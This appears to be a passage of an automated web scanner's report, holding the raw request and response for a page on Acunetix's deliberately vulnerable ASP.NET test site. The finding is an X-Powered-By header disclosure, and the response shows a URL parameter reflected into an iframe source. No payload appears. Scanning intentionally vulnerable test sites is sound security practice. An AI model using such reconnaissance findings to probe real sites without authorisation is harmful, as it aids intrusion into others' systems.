value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; 